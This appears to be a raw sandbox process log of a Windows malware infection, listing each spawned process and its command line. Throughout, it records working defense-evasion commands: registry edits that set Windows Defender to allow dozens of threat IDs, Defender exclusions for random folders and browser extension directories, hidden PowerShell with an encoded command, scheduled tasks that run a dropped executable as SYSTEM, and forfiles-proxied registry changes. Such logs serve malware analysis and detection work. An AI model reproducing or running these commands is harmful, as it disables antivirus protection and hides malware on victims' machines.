\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,14479666635586957191,1955158173873551193,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gWHhAbhiy" /SC once /ST 02:07:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gWHhAbhiy"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gWHhAbhiy"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 02:42:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe\" 0c /bNgqdidMU 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe 0c /bNgqdidMU 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5020 -ip 5020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 1076

C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe PP /YObdidneaD 385118 /S

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

